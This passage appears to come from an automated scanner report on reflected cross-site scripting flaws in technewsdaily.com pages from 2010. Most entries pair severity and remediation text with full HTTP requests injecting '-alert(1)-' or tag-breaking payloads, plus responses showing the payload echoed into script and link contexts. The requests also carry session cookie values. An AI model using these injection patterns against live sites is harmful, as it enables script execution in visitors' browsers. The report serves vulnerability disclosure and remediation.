<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" > <head> <script type="text/javascript"> <!-- var ...[SNIP]... <script type="text/javascript"> setTimeout('COMSCORE.beacon({'+ 'c1:2,'+ 'c2:"6035753",'+ 'c3:"6035753",'+ 'c4:"http://www.technewsdaily.com/section/software/?1f267'-alert(1)-'016a32755f9=1",'+ 'c5:"Technology - News",'+ 'c6:"",'+ 'c15:""'+ '});',0); </script> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b6f0d'-alert(1)-'a512e84ab16 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /sectionb6f0d'-alert(1)-'a512e84ab16/tech-one HTTP/1.1 Host: www.technewsdaily.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;
Response
HTTP/1.1 200 OK Date: Sat, 18 Dec 2010 02:52:53 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: Zend Core/2.5.5 PHP/5.2.11 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Sat, 18 Dec 2010 02:52:54 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 40428
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" > <head> <script type="text/javascript"> <!-- var ...[SNIP]... <script type="text/javascript"> setTimeout('COMSCORE.beacon({'+ 'c1:2,'+ 'c2:"6035753",'+ 'c3:"6035753",'+ 'c4:"http://www.technewsdaily.com/sectionb6f0d'-alert(1)-'a512e84ab16/tech-one",'+ 'c5:"Technology - News",'+ 'c6:"",'+ 'c15:""'+ '});',0); </script> ...[SNIP]...
1.172. http://www.technewsdaily.com/section/tech-one [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.technewsdaily.com
Path:
/section/tech-one
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fddea'-alert(1)-'37b5c24f6db was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /section/tech-one?fddea'-alert(1)-'37b5c24f6db=1 HTTP/1.1 Host: www.technewsdaily.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;
Response
HTTP/1.1 200 OK Date: Sat, 18 Dec 2010 02:52:48 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: Zend Core/2.5.5 PHP/5.2.11 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Sat, 18 Dec 2010 02:52:49 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 43625
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" > <head> <script type="text/javascript"> <!-- var ...[SNIP]... <script type="text/javascript"> setTimeout('COMSCORE.beacon({'+ 'c1:2,'+ 'c2:"6035753",'+ 'c3:"6035753",'+ 'c4:"http://www.technewsdaily.com/section/tech-one?fddea'-alert(1)-'37b5c24f6db=1",'+ 'c5:"Technology - News",'+ 'c6:"",'+ 'c15:""'+ '});',0); </script> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6efaf'-alert(1)-'59ad93c06af was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /section6efaf'-alert(1)-'59ad93c06af/tech-one/ HTTP/1.1 Host: www.technewsdaily.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;
Response
HTTP/1.1 200 OK Date: Sat, 18 Dec 2010 02:52:33 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: Zend Core/2.5.5 PHP/5.2.11 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Sat, 18 Dec 2010 02:52:33 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 40432
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" > <head> <script type="text/javascript"> <!-- var ...[SNIP]... <script type="text/javascript"> setTimeout('COMSCORE.beacon({'+ 'c1:2,'+ 'c2:"6035753",'+ 'c3:"6035753",'+ 'c4:"http://www.technewsdaily.com/section6efaf'-alert(1)-'59ad93c06af/tech-one/",'+ 'c5:"Technology - News",'+ 'c6:"",'+ 'c15:""'+ '});',0); </script> ...[SNIP]...
1.174. http://www.technewsdaily.com/section/tech-one/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.technewsdaily.com
Path:
/section/tech-one/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b2e3e'-alert(1)-'bba7e1fda95 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /section/tech-one/?b2e3e'-alert(1)-'bba7e1fda95=1 HTTP/1.1 Host: www.technewsdaily.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;
Response
HTTP/1.1 200 OK Date: Sat, 18 Dec 2010 02:52:27 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: Zend Core/2.5.5 PHP/5.2.11 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Sat, 18 Dec 2010 02:52:27 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 43643
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" > <head> <script type="text/javascript"> <!-- var ...[SNIP]... <script type="text/javascript"> setTimeout('COMSCORE.beacon({'+ 'c1:2,'+ 'c2:"6035753",'+ 'c3:"6035753",'+ 'c4:"http://www.technewsdaily.com/section/tech-one/?b2e3e'-alert(1)-'bba7e1fda95=1",'+ 'c5:"Technology - News",'+ 'c6:"",'+ 'c15:""'+ '});',0); </script> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c562e'-alert(1)-'a1749b0473b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /skylifter-flying-saucer-replacing-blimps-helicopters-1381c562e'-alert(1)-'a1749b0473b/ HTTP/1.1 Host: www.technewsdaily.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;
Response
HTTP/1.1 200 OK Date: Sat, 18 Dec 2010 02:55:14 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: Zend Core/2.5.5 PHP/5.2.11 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Sat, 18 Dec 2010 02:55:14 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 40512
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" > <head> <script type="text/javascript"> <!-- var ...[SNIP]... t/javascript"> setTimeout('COMSCORE.beacon({'+ 'c1:2,'+ 'c2:"6035753",'+ 'c3:"6035753",'+ 'c4:"http://www.technewsdaily.com/skylifter-flying-saucer-replacing-blimps-helicopters-1381c562e'-alert(1)-'a1749b0473b/",'+ 'c5:"Technology - News",'+ 'c6:"",'+ 'c15:""'+ '});',0); </script> ...[SNIP]...
1.176. http://www.technewsdaily.com/skylifter-flying-saucer-replacing-blimps-helicopters-1381/ [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 58ac3'-alert(1)-'059b41dd681 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /skylifter-flying-saucer-replacing-blimps-helicopters-1381/?58ac3'-alert(1)-'059b41dd681=1 HTTP/1.1 Host: www.technewsdaily.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;
Response
HTTP/1.1 200 OK Date: Sat, 18 Dec 2010 02:55:03 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: Zend Core/2.5.5 PHP/5.2.11 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Sat, 18 Dec 2010 02:55:03 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 65724
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml"> <head> <script type="text/javascript"> <!- ...[SNIP]... javascript"> setTimeout('COMSCORE.beacon({'+ 'c1:2,'+ 'c2:"6035753",'+ 'c3:"6035753",'+ 'c4:"http://www.technewsdaily.com/skylifter-flying-saucer-replacing-blimps-helicopters-1381/?58ac3'-alert(1)-'059b41dd681=1",'+ 'c5:"Technology - News",'+ 'c6:"",'+ 'c15:""'+ '});',0); </script> ...[SNIP]...
1.177. http://www.technewsdaily.com/skylifter-flying-saucer-replacing-blimps-helicopters-1381/ [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload df69f"><a>b51ac6643b6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /skylifter-flying-saucer-replacing-blimps-helicopters-1381/?df69f"><a>b51ac6643b6=1 HTTP/1.1 Host: www.technewsdaily.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;
Response
HTTP/1.1 200 OK Date: Sat, 18 Dec 2010 02:54:50 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: Zend Core/2.5.5 PHP/5.2.11 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Sat, 18 Dec 2010 02:54:50 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 66086
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml"> <head> <script type="text/javascript"> <!- ...[SNIP]... <link rel="canonical" src="http://www.technewsdaily.com/skylifter-flying-saucer-replacing-blimps-helicopters-1381/?df69f"><a>b51ac6643b6=1/" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fe882'-alert(1)-'a85c45cea4a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /sound-attachment-for-laptops-1798fe882'-alert(1)-'a85c45cea4a/ HTTP/1.1 Host: www.technewsdaily.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;
Response
HTTP/1.1 200 OK Date: Sat, 18 Dec 2010 02:54:59 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: Zend Core/2.5.5 PHP/5.2.11 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Sat, 18 Dec 2010 02:55:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 40464
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" > <head> <script type="text/javascript"> <!-- var ...[SNIP]... <script type="text/javascript"> setTimeout('COMSCORE.beacon({'+ 'c1:2,'+ 'c2:"6035753",'+ 'c3:"6035753",'+ 'c4:"http://www.technewsdaily.com/sound-attachment-for-laptops-1798fe882'-alert(1)-'a85c45cea4a/",'+ 'c5:"Technology - News",'+ 'c6:"",'+ 'c15:""'+ '});',0); </script> ...[SNIP]...
1.179. http://www.technewsdaily.com/sound-attachment-for-laptops-1798/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://www.technewsdaily.com
Path:
/sound-attachment-for-laptops-1798/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3b61d"><a>911e2bb66a1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /sound-attachment-for-laptops-1798/?3b61d"><a>911e2bb66a1=1 HTTP/1.1 Host: www.technewsdaily.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;
Response
HTTP/1.1 200 OK Date: Sat, 18 Dec 2010 02:54:37 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: Zend Core/2.5.5 PHP/5.2.11 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Sat, 18 Dec 2010 02:54:37 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 63649
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml"> <head> <script type="text/javascript"> <!- ...[SNIP]... <link rel="canonical" src="http://www.technewsdaily.com/sound-attachment-for-laptops-1798/?3b61d"><a>911e2bb66a1=1/" /> ...[SNIP]...
1.180. http://www.technewsdaily.com/sound-attachment-for-laptops-1798/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.technewsdaily.com
Path:
/sound-attachment-for-laptops-1798/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fb267'-alert(1)-'17ba15adde6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /sound-attachment-for-laptops-1798/?fb267'-alert(1)-'17ba15adde6=1 HTTP/1.1 Host: www.technewsdaily.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;
Response
HTTP/1.1 200 OK Date: Sat, 18 Dec 2010 02:54:49 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: Zend Core/2.5.5 PHP/5.2.11 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Sat, 18 Dec 2010 02:54:49 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 63287
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml"> <head> <script type="text/javascript"> <!- ...[SNIP]... <script type="text/javascript"> setTimeout('COMSCORE.beacon({'+ 'c1:2,'+ 'c2:"6035753",'+ 'c3:"6035753",'+ 'c4:"http://www.technewsdaily.com/sound-attachment-for-laptops-1798/?fb267'-alert(1)-'17ba15adde6=1",'+ 'c5:"Technology - News",'+ 'c6:"",'+ 'c15:""'+ '});',0); </script> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e54bc'-alert(1)-'9346134d09c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /stuxnet-malware-blueprint-dangerous-viruses-1353e54bc'-alert(1)-'9346134d09c/ HTTP/1.1 Host: www.technewsdaily.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;
Response
HTTP/1.1 200 OK Date: Sat, 18 Dec 2010 02:55:40 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: Zend Core/2.5.5 PHP/5.2.11 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Sat, 18 Dec 2010 02:55:41 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 40494
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" > <head> <script type="text/javascript"> <!-- var ...[SNIP]... type="text/javascript"> setTimeout('COMSCORE.beacon({'+ 'c1:2,'+ 'c2:"6035753",'+ 'c3:"6035753",'+ 'c4:"http://www.technewsdaily.com/stuxnet-malware-blueprint-dangerous-viruses-1353e54bc'-alert(1)-'9346134d09c/",'+ 'c5:"Technology - News",'+ 'c6:"",'+ 'c15:""'+ '});',0); </script> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e6603'-alert(1)-'4bd04740dd0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /t-mobile-wants-to-make-3g-faster-than-4g-1833e6603'-alert(1)-'4bd04740dd0/ HTTP/1.1 Host: www.technewsdaily.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;
Response
HTTP/1.1 200 OK Date: Sat, 18 Dec 2010 02:52:12 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: Zend Core/2.5.5 PHP/5.2.11 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Sat, 18 Dec 2010 02:52:12 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 40488
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" > <head> <script type="text/javascript"> <!-- var ...[SNIP]... pt type="text/javascript"> setTimeout('COMSCORE.beacon({'+ 'c1:2,'+ 'c2:"6035753",'+ 'c3:"6035753",'+ 'c4:"http://www.technewsdaily.com/t-mobile-wants-to-make-3g-faster-than-4g-1833e6603'-alert(1)-'4bd04740dd0/",'+ 'c5:"Technology - News",'+ 'c6:"",'+ 'c15:""'+ '});',0); </script> ...[SNIP]...
1.183. http://www.technewsdaily.com/t-mobile-wants-to-make-3g-faster-than-4g-1833/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://www.technewsdaily.com
Path:
/t-mobile-wants-to-make-3g-faster-than-4g-1833/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1087d"><a>0265220a7a6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /t-mobile-wants-to-make-3g-faster-than-4g-1833/?1087d"><a>0265220a7a6=1 HTTP/1.1 Host: www.technewsdaily.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;
Response
HTTP/1.1 200 OK Date: Sat, 18 Dec 2010 02:51:51 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: Zend Core/2.5.5 PHP/5.2.11 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Sat, 18 Dec 2010 02:51:51 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 62276
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml"> <head> <script type="text/javascript"> <!- ...[SNIP]... <link rel="canonical" src="http://www.technewsdaily.com/t-mobile-wants-to-make-3g-faster-than-4g-1833/?1087d"><a>0265220a7a6=1/" /> ...[SNIP]...
